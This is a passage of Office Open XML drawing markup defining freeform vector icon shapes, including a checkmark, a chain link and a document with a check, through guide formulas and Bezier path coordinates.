                <a:gd name="T17" fmla="*/ 95956 h 63"/>
                <a:gd name="T18" fmla="*/ 24023 w 68"/>
                <a:gd name="T19" fmla="*/ 78821 h 63"/>
                <a:gd name="T20" fmla="*/ 13727 w 68"/>
                <a:gd name="T21" fmla="*/ 61686 h 63"/>
                <a:gd name="T22" fmla="*/ 51477 w 68"/>
                <a:gd name="T23" fmla="*/ 54832 h 63"/>
                <a:gd name="T24" fmla="*/ 65204 w 68"/>
                <a:gd name="T25" fmla="*/ 27416 h 63"/>
                <a:gd name="T26" fmla="*/ 96091 w 68"/>
                <a:gd name="T27" fmla="*/ 51405 h 63"/>
                <a:gd name="T28" fmla="*/ 120113 w 68"/>
                <a:gd name="T29" fmla="*/ 41124 h 63"/>
                <a:gd name="T30" fmla="*/ 140704 w 68"/>
                <a:gd name="T31" fmla="*/ 65113 h 63"/>
                <a:gd name="T32" fmla="*/ 154431 w 68"/>
                <a:gd name="T33" fmla="*/ 92529 h 63"/>
                <a:gd name="T34" fmla="*/ 78932 w 68"/>
                <a:gd name="T35" fmla="*/ 75394 h 63"/>
                <a:gd name="T36" fmla="*/ 109818 w 68"/>
                <a:gd name="T37" fmla="*/ 106237 h 63"/>
                <a:gd name="T38" fmla="*/ 216204 w 68"/>
                <a:gd name="T39" fmla="*/ 54832 h 63"/>
                <a:gd name="T40" fmla="*/ 219636 w 68"/>
                <a:gd name="T41" fmla="*/ 82248 h 63"/>
                <a:gd name="T42" fmla="*/ 188749 w 68"/>
                <a:gd name="T43" fmla="*/ 75394 h 63"/>
                <a:gd name="T44" fmla="*/ 157863 w 68"/>
                <a:gd name="T45" fmla="*/ 82248 h 63"/>
                <a:gd name="T46" fmla="*/ 157863 w 68"/>
                <a:gd name="T47" fmla="*/ 54832 h 63"/>
                <a:gd name="T48" fmla="*/ 157863 w 68"/>
                <a:gd name="T49" fmla="*/ 30843 h 63"/>
                <a:gd name="T50" fmla="*/ 157863 w 68"/>
                <a:gd name="T51" fmla="*/ 6854 h 63"/>
                <a:gd name="T52" fmla="*/ 188749 w 68"/>
                <a:gd name="T53" fmla="*/ 13708 h 63"/>
                <a:gd name="T54" fmla="*/ 202477 w 68"/>
                <a:gd name="T55" fmla="*/ 0 h 63"/>
                <a:gd name="T56" fmla="*/ 212772 w 68"/>
                <a:gd name="T57" fmla="*/ 23989 h 63"/>
                <a:gd name="T58" fmla="*/ 233363 w 68"/>
                <a:gd name="T59" fmla="*/ 51405 h 63"/>
                <a:gd name="T60" fmla="*/ 212772 w 68"/>
                <a:gd name="T61" fmla="*/ 188484 h 63"/>
                <a:gd name="T62" fmla="*/ 202477 w 68"/>
                <a:gd name="T63" fmla="*/ 215900 h 63"/>
                <a:gd name="T64" fmla="*/ 185318 w 68"/>
                <a:gd name="T65" fmla="*/ 202192 h 63"/>
                <a:gd name="T66" fmla="*/ 154431 w 68"/>
                <a:gd name="T67" fmla="*/ 205619 h 63"/>
                <a:gd name="T68" fmla="*/ 140704 w 68"/>
                <a:gd name="T69" fmla="*/ 178203 h 63"/>
                <a:gd name="T70" fmla="*/ 161295 w 68"/>
                <a:gd name="T71" fmla="*/ 150787 h 63"/>
                <a:gd name="T72" fmla="*/ 171590 w 68"/>
                <a:gd name="T73" fmla="*/ 123371 h 63"/>
                <a:gd name="T74" fmla="*/ 192181 w 68"/>
                <a:gd name="T75" fmla="*/ 137079 h 63"/>
                <a:gd name="T76" fmla="*/ 219636 w 68"/>
                <a:gd name="T77" fmla="*/ 133652 h 63"/>
                <a:gd name="T78" fmla="*/ 216204 w 68"/>
                <a:gd name="T79" fmla="*/ 157641 h 63"/>
                <a:gd name="T80" fmla="*/ 188749 w 68"/>
                <a:gd name="T81" fmla="*/ 27416 h 63"/>
                <a:gd name="T82" fmla="*/ 202477 w 68"/>
                <a:gd name="T83" fmla="*/ 44551 h 63"/>
                <a:gd name="T84" fmla="*/ 171590 w 68"/>
                <a:gd name="T85" fmla="*/ 167922 h 63"/>
                <a:gd name="T86" fmla="*/ 188749 w 68"/>
                <a:gd name="T87" fmla="*/ 154214 h 6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75" name="Freeform 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04A79155-E125-4420-B44C-86DC4CFF6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4729" y="3741253"/>
              <a:ext cx="213110" cy="279077"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 55910 w 338"/>
                <a:gd name="T1" fmla="*/ 159887 h 356"/>
                <a:gd name="T2" fmla="*/ 55910 w 338"/>
                <a:gd name="T3" fmla="*/ 159887 h 356"/>
                <a:gd name="T4" fmla="*/ 44187 w 338"/>
                <a:gd name="T5" fmla="*/ 151780 h 356"/>
                <a:gd name="T6" fmla="*/ 4058 w 338"/>
                <a:gd name="T7" fmla="*/ 99985 h 356"/>
                <a:gd name="T8" fmla="*/ 8116 w 338"/>
                <a:gd name="T9" fmla="*/ 80169 h 356"/>
                <a:gd name="T10" fmla="*/ 27955 w 338"/>
                <a:gd name="T11" fmla="*/ 80169 h 356"/>
                <a:gd name="T12" fmla="*/ 55910 w 338"/>
                <a:gd name="T13" fmla="*/ 116199 h 356"/>
                <a:gd name="T14" fmla="*/ 119936 w 338"/>
                <a:gd name="T15" fmla="*/ 12160 h 356"/>
                <a:gd name="T16" fmla="*/ 143833 w 338"/>
                <a:gd name="T17" fmla="*/ 4053 h 356"/>
                <a:gd name="T18" fmla="*/ 147891 w 338"/>
                <a:gd name="T19" fmla="*/ 27924 h 356"/>
                <a:gd name="T20" fmla="*/ 72142 w 338"/>
                <a:gd name="T21" fmla="*/ 151780 h 356"/>
                <a:gd name="T22" fmla="*/ 55910 w 338"/>
                <a:gd name="T23" fmla="*/ 159887 h 3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8" h="356">
                  <a:moveTo>
                    <a:pt x="124" y="355"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124" y="355"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="355"/>
                    <a:pt x="107" y="346"/>
                    <a:pt x="98" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="222"/>
                    <a:pt x="9" y="222"/>
                    <a:pt x="9" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="204"/>
                    <a:pt x="0" y="187"/>
                    <a:pt x="18" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="160"/>
                    <a:pt x="53" y="168"/>
                    <a:pt x="62" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="258"/>
                    <a:pt x="124" y="258"/>
                    <a:pt x="124" y="258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="27"/>
                    <a:pt x="266" y="27"/>
                    <a:pt x="266" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="9"/>
                    <a:pt x="301" y="0"/>
                    <a:pt x="319" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="18"/>
                    <a:pt x="337" y="45"/>
                    <a:pt x="328" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="337"/>
                    <a:pt x="160" y="337"/>
                    <a:pt x="160" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="346"/>
                    <a:pt x="142" y="355"/>
                    <a:pt x="124" y="35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76" name="Freeform 125">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A6B818-58A8-42FA-9934-85854F0D4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6896" y="3094337"/>
              <a:ext cx="328128" cy="328130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195663 w 587"/>
                <a:gd name="T1" fmla="*/ 73611 h 588"/>
                <a:gd name="T2" fmla="*/ 195663 w 587"/>
                <a:gd name="T3" fmla="*/ 73611 h 588"/>
                <a:gd name="T4" fmla="*/ 167608 w 587"/>
                <a:gd name="T5" fmla="*/ 101619 h 588"/>
                <a:gd name="T6" fmla="*/ 129483 w 587"/>
                <a:gd name="T7" fmla="*/ 111673 h 588"/>
                <a:gd name="T8" fmla="*/ 152502 w 587"/>
                <a:gd name="T9" fmla="*/ 86538 h 588"/>
                <a:gd name="T10" fmla="*/ 155020 w 587"/>
                <a:gd name="T11" fmla="*/ 86538 h 588"/>
                <a:gd name="T12" fmla="*/ 183074 w 587"/>
                <a:gd name="T13" fmla="*/ 58530 h 588"/>
                <a:gd name="T14" fmla="*/ 183074 w 587"/>
                <a:gd name="T15" fmla="*/ 30522 h 588"/>
                <a:gd name="T16" fmla="*/ 155020 w 587"/>
                <a:gd name="T17" fmla="*/ 30522 h 588"/>
                <a:gd name="T18" fmla="*/ 124447 w 587"/>
                <a:gd name="T19" fmla="*/ 58530 h 588"/>
                <a:gd name="T20" fmla="*/ 124447 w 587"/>
                <a:gd name="T21" fmla="*/ 58530 h 588"/>
                <a:gd name="T22" fmla="*/ 124447 w 587"/>
                <a:gd name="T23" fmla="*/ 58530 h 588"/>
                <a:gd name="T24" fmla="*/ 101788 w 587"/>
                <a:gd name="T25" fmla="*/ 84024 h 588"/>
                <a:gd name="T26" fmla="*/ 111859 w 587"/>
                <a:gd name="T27" fmla="*/ 43448 h 588"/>
                <a:gd name="T28" fmla="*/ 139554 w 587"/>
                <a:gd name="T29" fmla="*/ 15440 h 588"/>
                <a:gd name="T30" fmla="*/ 195663 w 587"/>
                <a:gd name="T31" fmla="*/ 15440 h 588"/>
                <a:gd name="T32" fmla="*/ 195663 w 587"/>
                <a:gd name="T33" fmla="*/ 73611 h 588"/>
                <a:gd name="T34" fmla="*/ 81286 w 587"/>
                <a:gd name="T35" fmla="*/ 147222 h 588"/>
                <a:gd name="T36" fmla="*/ 81286 w 587"/>
                <a:gd name="T37" fmla="*/ 147222 h 588"/>
                <a:gd name="T38" fmla="*/ 81286 w 587"/>
                <a:gd name="T39" fmla="*/ 147222 h 588"/>
                <a:gd name="T40" fmla="*/ 73733 w 587"/>
                <a:gd name="T41" fmla="*/ 149736 h 588"/>
                <a:gd name="T42" fmla="*/ 63303 w 587"/>
                <a:gd name="T43" fmla="*/ 139681 h 588"/>
                <a:gd name="T44" fmla="*/ 65820 w 587"/>
                <a:gd name="T45" fmla="*/ 132141 h 588"/>
                <a:gd name="T46" fmla="*/ 132001 w 587"/>
                <a:gd name="T47" fmla="*/ 66070 h 588"/>
                <a:gd name="T48" fmla="*/ 139554 w 587"/>
                <a:gd name="T49" fmla="*/ 61043 h 588"/>
                <a:gd name="T50" fmla="*/ 149984 w 587"/>
                <a:gd name="T51" fmla="*/ 71097 h 588"/>
                <a:gd name="T52" fmla="*/ 147467 w 587"/>
                <a:gd name="T53" fmla="*/ 78638 h 588"/>
                <a:gd name="T54" fmla="*/ 147467 w 587"/>
                <a:gd name="T55" fmla="*/ 78638 h 588"/>
                <a:gd name="T56" fmla="*/ 81286 w 587"/>
                <a:gd name="T57" fmla="*/ 147222 h 588"/>
                <a:gd name="T58" fmla="*/ 58267 w 587"/>
                <a:gd name="T59" fmla="*/ 124600 h 588"/>
                <a:gd name="T60" fmla="*/ 58267 w 587"/>
                <a:gd name="T61" fmla="*/ 124600 h 588"/>
                <a:gd name="T62" fmla="*/ 30572 w 587"/>
                <a:gd name="T63" fmla="*/ 152249 h 588"/>
                <a:gd name="T64" fmla="*/ 30572 w 587"/>
                <a:gd name="T65" fmla="*/ 180257 h 588"/>
                <a:gd name="T66" fmla="*/ 58267 w 587"/>
                <a:gd name="T67" fmla="*/ 180257 h 588"/>
                <a:gd name="T68" fmla="*/ 86322 w 587"/>
                <a:gd name="T69" fmla="*/ 152249 h 588"/>
                <a:gd name="T70" fmla="*/ 88840 w 587"/>
                <a:gd name="T71" fmla="*/ 152249 h 588"/>
                <a:gd name="T72" fmla="*/ 111859 w 587"/>
                <a:gd name="T73" fmla="*/ 129627 h 588"/>
                <a:gd name="T74" fmla="*/ 101788 w 587"/>
                <a:gd name="T75" fmla="*/ 167690 h 588"/>
                <a:gd name="T76" fmla="*/ 73733 w 587"/>
                <a:gd name="T77" fmla="*/ 195698 h 588"/>
                <a:gd name="T78" fmla="*/ 17624 w 587"/>
                <a:gd name="T79" fmla="*/ 195698 h 588"/>
                <a:gd name="T80" fmla="*/ 17624 w 587"/>
                <a:gd name="T81" fmla="*/ 139681 h 588"/>
                <a:gd name="T82" fmla="*/ 45679 w 587"/>
                <a:gd name="T83" fmla="*/ 111673 h 588"/>
                <a:gd name="T84" fmla="*/ 83804 w 587"/>
                <a:gd name="T85" fmla="*/ 99106 h 588"/>
                <a:gd name="T86" fmla="*/ 58267 w 587"/>
                <a:gd name="T87" fmla="*/ 124600 h 58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87" h="588">
                  <a:moveTo>
                    <a:pt x="544" y="205"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="544" y="205"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="466" y="283"/>
                    <a:pt x="466" y="283"/>
                    <a:pt x="466" y="283"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="438" y="311"/>
                    <a:pt x="396" y="319"/>
                    <a:pt x="360" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="424" y="241"/>
                    <a:pt x="424" y="241"/>
                    <a:pt x="424" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="424" y="241"/>
                    <a:pt x="424" y="241"/>
                    <a:pt x="431" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="509" y="163"/>
                    <a:pt x="509" y="163"/>
                    <a:pt x="509" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="530" y="142"/>
                    <a:pt x="530" y="106"/>
                    <a:pt x="509" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="487" y="64"/>
                    <a:pt x="452" y="64"/>
                    <a:pt x="431" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="163"/>
                    <a:pt x="346" y="163"/>
                    <a:pt x="346" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="234"/>
                    <a:pt x="283" y="234"/>
                    <a:pt x="283" y="234"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268" y="191"/>
                    <a:pt x="283" y="149"/>
                    <a:pt x="311" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="43"/>
                    <a:pt x="388" y="43"/>
                    <a:pt x="388" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="431" y="0"/>
                    <a:pt x="501" y="0"/>
                    <a:pt x="544" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="586" y="85"/>
                    <a:pt x="586" y="156"/>
                    <a:pt x="544" y="205"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="226" y="410"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="226" y="410"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="417"/>
                    <a:pt x="212" y="417"/>
                    <a:pt x="205" y="417"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="417"/>
                    <a:pt x="176" y="403"/>
                    <a:pt x="176" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="382"/>
                    <a:pt x="176" y="375"/>
                    <a:pt x="183" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="184"/>
                    <a:pt x="367" y="184"/>
                    <a:pt x="367" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="177"/>
                    <a:pt x="381" y="170"/>
                    <a:pt x="388" y="170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="170"/>
                    <a:pt x="417" y="184"/>
                    <a:pt x="417" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="205"/>
                    <a:pt x="417" y="212"/>
                    <a:pt x="410" y="219"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="226" y="410"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="162" y="347"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="162" y="347"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="424"/>
                    <a:pt x="85" y="424"/>
                    <a:pt x="85" y="424"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="446"/>
                    <a:pt x="63" y="481"/>
                    <a:pt x="85" y="502"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="530"/>
                    <a:pt x="141" y="530"/>
                    <a:pt x="162" y="502"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="424"/>
                    <a:pt x="240" y="424"/>
                    <a:pt x="240" y="424"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="247" y="424"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="361"/>
                    <a:pt x="311" y="361"/>
                    <a:pt x="311" y="361"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="318" y="396"/>
                    <a:pt x="311" y="439"/>
                    <a:pt x="283" y="467"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="545"/>
                    <a:pt x="205" y="545"/>
                    <a:pt x="205" y="545"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="587"/>
                    <a:pt x="92" y="587"/>
                    <a:pt x="49" y="545"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="502"/>
                    <a:pt x="0" y="432"/>
                    <a:pt x="49" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="311"/>
                    <a:pt x="127" y="311"/>
                    <a:pt x="127" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="276"/>
                    <a:pt x="198" y="269"/>
                    <a:pt x="233" y="276"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="347"/>
                    <a:pt x="162" y="347"/>
                    <a:pt x="162" y="34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78" name="Freeform 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F37247A-D997-4FC0-ADF1-F7B906004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5459" y="3718939"/>
              <a:ext cx="278052" cy="304419"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 64536992 w 510"/>
                <a:gd name="T1" fmla="*/ 61528392 h 559"/>
                <a:gd name="T2" fmla="*/ 64536992 w 510"/>
                <a:gd name="T3" fmla="*/ 61528392 h 559"/>
                <a:gd name="T4" fmla="*/ 55280025 w 510"/>
                <a:gd name="T5" fmla="*/ 70763999 h 559"/>
                <a:gd name="T6" fmla="*/ 52542328 w 510"/>
                <a:gd name="T7" fmla="*/ 72585008 h 559"/>
                <a:gd name="T8" fmla="*/ 49804270 w 510"/>
                <a:gd name="T9" fmla="*/ 70763999 h 559"/>
                <a:gd name="T10" fmla="*/ 45240961 w 510"/>
                <a:gd name="T11" fmla="*/ 66211296 h 559"/>
                <a:gd name="T12" fmla="*/ 44328516 w 510"/>
                <a:gd name="T13" fmla="*/ 63349401 h 559"/>
                <a:gd name="T14" fmla="*/ 47979019 w 510"/>
                <a:gd name="T15" fmla="*/ 59707023 h 559"/>
                <a:gd name="T16" fmla="*/ 49804270 w 510"/>
                <a:gd name="T17" fmla="*/ 61528392 h 559"/>
                <a:gd name="T18" fmla="*/ 52542328 w 510"/>
                <a:gd name="T19" fmla="*/ 63349401 h 559"/>
                <a:gd name="T20" fmla="*/ 59973683 w 510"/>
                <a:gd name="T21" fmla="*/ 56065005 h 559"/>
                <a:gd name="T22" fmla="*/ 59973683 w 510"/>
                <a:gd name="T23" fmla="*/ 56065005 h 559"/>
                <a:gd name="T24" fmla="*/ 62711741 w 510"/>
                <a:gd name="T25" fmla="*/ 55154320 h 559"/>
                <a:gd name="T26" fmla="*/ 66362244 w 510"/>
                <a:gd name="T27" fmla="*/ 58796699 h 559"/>
                <a:gd name="T28" fmla="*/ 64536992 w 510"/>
                <a:gd name="T29" fmla="*/ 61528392 h 559"/>
                <a:gd name="T30" fmla="*/ 53454773 w 510"/>
                <a:gd name="T31" fmla="*/ 56975329 h 559"/>
                <a:gd name="T32" fmla="*/ 53454773 w 510"/>
                <a:gd name="T33" fmla="*/ 56975329 h 559"/>
                <a:gd name="T34" fmla="*/ 52542328 w 510"/>
                <a:gd name="T35" fmla="*/ 57886014 h 559"/>
                <a:gd name="T36" fmla="*/ 47979019 w 510"/>
                <a:gd name="T37" fmla="*/ 56065005 h 559"/>
                <a:gd name="T38" fmla="*/ 40547302 w 510"/>
                <a:gd name="T39" fmla="*/ 63349401 h 559"/>
                <a:gd name="T40" fmla="*/ 42372554 w 510"/>
                <a:gd name="T41" fmla="*/ 68942990 h 559"/>
                <a:gd name="T42" fmla="*/ 42372554 w 510"/>
                <a:gd name="T43" fmla="*/ 68942990 h 559"/>
                <a:gd name="T44" fmla="*/ 44328516 w 510"/>
                <a:gd name="T45" fmla="*/ 70763999 h 559"/>
                <a:gd name="T46" fmla="*/ 44328516 w 510"/>
                <a:gd name="T47" fmla="*/ 70763999 h 559"/>
                <a:gd name="T48" fmla="*/ 31421045 w 510"/>
                <a:gd name="T49" fmla="*/ 70763999 h 559"/>
                <a:gd name="T50" fmla="*/ 31421045 w 510"/>
                <a:gd name="T51" fmla="*/ 70763999 h 559"/>
                <a:gd name="T52" fmla="*/ 3780852 w 510"/>
                <a:gd name="T53" fmla="*/ 70763999 h 559"/>
                <a:gd name="T54" fmla="*/ 0 w 510"/>
                <a:gd name="T55" fmla="*/ 67121620 h 559"/>
                <a:gd name="T56" fmla="*/ 0 w 510"/>
                <a:gd name="T57" fmla="*/ 3642379 h 559"/>
                <a:gd name="T58" fmla="*/ 3780852 w 510"/>
                <a:gd name="T59" fmla="*/ 0 h 559"/>
                <a:gd name="T60" fmla="*/ 11994664 w 510"/>
                <a:gd name="T61" fmla="*/ 0 h 559"/>
                <a:gd name="T62" fmla="*/ 23076884 w 510"/>
                <a:gd name="T63" fmla="*/ 0 h 559"/>
                <a:gd name="T64" fmla="*/ 23076884 w 510"/>
                <a:gd name="T65" fmla="*/ 13788670 h 559"/>
                <a:gd name="T66" fmla="*/ 23076884 w 510"/>
                <a:gd name="T67" fmla="*/ 21073067 h 559"/>
                <a:gd name="T68" fmla="*/ 30508239 w 510"/>
                <a:gd name="T69" fmla="*/ 28487664 h 559"/>
                <a:gd name="T70" fmla="*/ 37809606 w 510"/>
                <a:gd name="T71" fmla="*/ 28487664 h 559"/>
                <a:gd name="T72" fmla="*/ 53454773 w 510"/>
                <a:gd name="T73" fmla="*/ 28487664 h 559"/>
                <a:gd name="T74" fmla="*/ 53454773 w 510"/>
                <a:gd name="T75" fmla="*/ 50471416 h 559"/>
                <a:gd name="T76" fmla="*/ 53454773 w 510"/>
                <a:gd name="T77" fmla="*/ 50471416 h 559"/>
                <a:gd name="T78" fmla="*/ 53454773 w 510"/>
                <a:gd name="T79" fmla="*/ 56975329 h 559"/>
                <a:gd name="T80" fmla="*/ 30508239 w 510"/>
                <a:gd name="T81" fmla="*/ 24845286 h 559"/>
                <a:gd name="T82" fmla="*/ 30508239 w 510"/>
                <a:gd name="T83" fmla="*/ 24845286 h 559"/>
                <a:gd name="T84" fmla="*/ 26727387 w 510"/>
                <a:gd name="T85" fmla="*/ 21073067 h 559"/>
                <a:gd name="T86" fmla="*/ 26727387 w 510"/>
                <a:gd name="T87" fmla="*/ 13788670 h 559"/>
                <a:gd name="T88" fmla="*/ 26727387 w 510"/>
                <a:gd name="T89" fmla="*/ 0 h 559"/>
                <a:gd name="T90" fmla="*/ 53454773 w 510"/>
                <a:gd name="T91" fmla="*/ 24845286 h 559"/>
                <a:gd name="T92" fmla="*/ 37809606 w 510"/>
                <a:gd name="T93" fmla="*/ 24845286 h 559"/>
                <a:gd name="T94" fmla="*/ 30508239 w 510"/>
                <a:gd name="T95" fmla="*/ 24845286 h 55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10" h="559">
                  <a:moveTo>
                    <a:pt x="495" y="473"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="495" y="473"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="424" y="544"/>
                    <a:pt x="424" y="544"/>
                    <a:pt x="424" y="544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="417" y="551"/>
                    <a:pt x="410" y="558"/>
                    <a:pt x="403" y="558"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="396" y="558"/>
                    <a:pt x="389" y="551"/>
                    <a:pt x="382" y="544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="347" y="509"/>
                    <a:pt x="347" y="509"/>
                    <a:pt x="347" y="509"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="502"/>
                    <a:pt x="340" y="495"/>
                    <a:pt x="340" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="473"/>
                    <a:pt x="347" y="459"/>
                    <a:pt x="368" y="459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="459"/>
                    <a:pt x="382" y="466"/>
                    <a:pt x="382" y="473"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="403" y="487"/>
                    <a:pt x="403" y="487"/>
                    <a:pt x="403" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="460" y="431"/>
                    <a:pt x="460" y="431"/>
                    <a:pt x="460" y="431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="467" y="424"/>
                    <a:pt x="474" y="424"/>
                    <a:pt x="481" y="424"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="495" y="424"/>
                    <a:pt x="509" y="438"/>
                    <a:pt x="509" y="452"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="509" y="459"/>
                    <a:pt x="502" y="466"/>
                    <a:pt x="495" y="473"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="410" y="438"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410" y="438"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="403" y="445"/>
                    <a:pt x="403" y="445"/>
                    <a:pt x="403" y="445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="396" y="438"/>
                    <a:pt x="382" y="431"/>
                    <a:pt x="368" y="431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="431"/>
                    <a:pt x="311" y="459"/>
                    <a:pt x="311" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="509"/>
                    <a:pt x="318" y="523"/>
                    <a:pt x="325" y="530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="544"/>
                    <a:pt x="340" y="544"/>
                    <a:pt x="340" y="544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="544"/>
                    <a:pt x="241" y="544"/>
                    <a:pt x="241" y="544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="544"/>
                    <a:pt x="29" y="544"/>
                    <a:pt x="29" y="544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="544"/>
                    <a:pt x="0" y="537"/>
                    <a:pt x="0" y="51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4"/>
                    <a:pt x="7" y="0"/>
                    <a:pt x="29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177" y="0"/>
                    <a:pt x="177" y="0"/>
                    <a:pt x="177" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="106"/>
                    <a:pt x="177" y="106"/>
                    <a:pt x="177" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="162"/>
                    <a:pt x="177" y="162"/>
                    <a:pt x="177" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="191"/>
                    <a:pt x="205" y="219"/>
                    <a:pt x="234" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="219"/>
                    <a:pt x="290" y="219"/>
                    <a:pt x="290" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="219"/>
                    <a:pt x="410" y="219"/>
                    <a:pt x="410" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="388"/>
                    <a:pt x="410" y="388"/>
                    <a:pt x="410" y="388"/>
